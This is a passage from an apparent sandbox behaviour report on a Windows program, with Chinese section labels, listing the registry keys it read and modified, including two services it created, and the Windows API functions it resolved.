  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SysMain\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SysMain\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinHttpAutoProxySvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinHttpAutoProxySvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPDBusEnum\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPDBusEnum\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\WOW64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-20\ProfileImagePath
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Environment
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\Group
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ObjectName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate
修改的注册表键
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ComputerZ_x64
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\DisplayName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ErrorControl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\ImagePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Start
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Type
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ComputerZ_x64\Security
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ComputerZ_x64\Security\Security
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sd sdf kjsdf otgkl
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sd sdf kjsdf otgkl\MarkTime
删除的注册表键 无信息
API解析
  • kernel32.dll.IsProcessorFeaturePresent
  • cryptbase.dll.SystemFunction036
  • advapi32.dll.OpenSCManagerA
  • advapi32.dll.OpenServiceA
  • advapi32.dll.CloseServiceHandle
  • rasapi32.dll.RasConnectionNotificationW
  • sechost.dll.NotifyServiceStatusChangeA
  • advapi32.dll.CreateServiceA
  • advapi32.dll.ControlService
  • kernel32.dll.GetLastError
  • advapi32.dll.StartServiceA
  • kernel32.dll.CreateFileA
  • kernel32.dll.CreateDirectoryA
  • kernel32.dll.MoveFileA
  • gdi32.dll.GetLayout
  • gdi32.dll.GdiRealizationInfo
  • gdi32.dll.FontIsLinked
  • advapi32.dll.RegOpenKeyExW
  • advapi32.dll.RegQueryInfoKeyW
  • gdi32.dll.GetTextFaceAliasW
  • advapi32.dll.RegEnumValueW
  • advapi32.dll.RegCloseKey
  • advapi32.dll.RegQueryValueExW
  • advapi32.dll.RegQueryValueExA
  • advapi32.dll.RegEnumKeyExW
  • gdi32.dll.GetTextExtentExPointWPri
  • comctl32.dll.RegisterClassNameW
  • uxtheme.dll.EnableThemeDialogTexture
  • uxtheme.dll.OpenThemeData
  • ole32.dll.CoInitializeEx
  • ole32.dll.CoUninitialize
  • ole32.dll.CoRegisterInitializeSpy
  • ole32.dll.CoRevokeInitializeSpy
  • user32.dll.GetSystemMetrics
  • user32.dll.MonitorFromWindow
  • user32.dll.MonitorFromRect
  • user32.dll.MonitorFromPoint
  • user32.dll.EnumDisplayMonitors
  • user32.dll.GetMonitorInfoA
  • gdi32.dll.GetFontAssocStatus
  • oleaut32.dll.SysAllocString
  • oleaut32.dll.SysStringLen
  • oleaut32.dll.SysFreeString
  • kernel32.dll.GetModuleFileNameA
  • kernel32.dll.GetCommandLineA
  • kernel32.dll.IsBadReadPtr
  • kernel32.dll.HeapFree
  • kernel32.dll.HeapReAlloc
  • kernel32.dll.Sleep
  • kernel32.dll.GetTickCount
  • kernel32.dll.GetTimeZoneInformation
  • kernel32.dll.SetLastError
  • kernel32.dll.GetCurrentThreadId
  • kernel32.dll.GetCurrentThread
  • kernel32.dll.lstrcmpiA
  • kernel32.dll.lstrcmpA
  • kernel32.dll.GlobalDeleteAtom
  • kernel32.dll.GlobalAlloc
  • kernel32.dll.GlobalLock
  • kernel32.dll.CloseHandle
  • kernel32.dll.WaitForSingleObject
  • kernel32.dll.InterlockedIncrement
  • kernel32.dll.InterlockedDecrement
  • kernel32.dll.lstrlenA
  • kernel32.dll.WideCharToMultiByte
  • kernel32.dll.MultiByteToWideChar
  • kernel32.dll.GlobalUnlock
  • kernel32.dll.HeapAlloc
  • kernel32.dll.LocalFree
  • kernel32.dll.lstrcpynA
  • kernel32.dll.EnterCriticalSection
  • kernel32.dll.lstrcpyA
  • kernel32.dll.LocalAlloc
  • kernel32.dll.LoadLibraryA
  • kernel32.dll.InitializeCriticalSection
  • kernel32.dll.DeleteCriticalSection
  • kernel32.dll.LeaveCriticalSection
  • kernel32.dll.GetCurrentProcess
  • kernel32.dll.WriteFile
  • kernel32.dll.SetFilePointer
  • kernel32.dll.FlushFileBuffers
  • kernel32.dll.GetProcAddress
  • kernel32.dll.TlsAlloc
  • kernel32.dll.GlobalFree
  • kernel32.dll.GlobalHandle
  • kernel32.dll.TlsFree
  • kernel32.dll.GlobalReAlloc
  • kernel32.dll.TlsSetValue
  • kernel32.dll.LocalReAlloc
  • kernel32.dll.TlsGetValue
  • kernel32.dll.GlobalFlags
  • kernel32.dll.WritePrivateProfileStringA
  • kernel32.dll.lstrcatA
  • kernel32.dll.GlobalFindAtomA
  • kernel32.dll.GlobalAddAtomA
  • kernel32.dll.GlobalGetAtomNameA
  • kernel32.dll.GetVersion
  • kernel32.dll.GetProcessVersion
  • kernel32.dll.SetErrorMode
  • kernel32.dll.GetCPInfo
  • kernel32.dll.GetOEMCP
